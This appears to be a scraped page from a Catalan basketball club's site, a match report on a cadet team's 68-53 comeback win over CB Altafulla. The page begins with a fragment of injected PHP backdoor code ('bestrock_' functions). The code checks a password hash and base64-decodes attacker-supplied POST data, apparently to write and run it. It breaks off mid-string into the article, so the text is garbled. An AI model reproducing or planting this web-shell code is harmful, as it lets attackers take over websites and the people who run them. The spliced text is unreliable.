function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El cadet masculí 03 es refà d'un mal inici i venç el CB Altafulla després d'una gran remuntada (68-53) - Tgn Bàsquet Club -

El cadet masculí 03 es refà d’un mal inici i venç el CB Altafulla després d’una gran remuntada (68-53)

Updated: gener 16, 2018

El cadet masculí 03 del TGN Bàsquet va derrotar el CB Altafulla en un partit en què va haver de treballar de valent per redreçar el seu mal inici. Així, els visitants van sortir més concentrats al partit i van marcar un parcial de sortida de 4-13 que va obligar el tècnic local a demanar un temps mort als tres minuts de joc. Això va asserenar els ànims dels liles que van evitar que la sagnia fos més gran i van començar, a poc a poc a retallar diferències fins a capgirar el resultat pot abans del descans (31-29).

La bona disposició a la pista, la capacitat de recuperar pilotes i sortir al contraatac va permetre el TGN Bàsquet ser molt superior al seu rival en el tercer quart (24-7 de parcial) i deixar el matx pràcticament resolt a l’inici de l’últim període.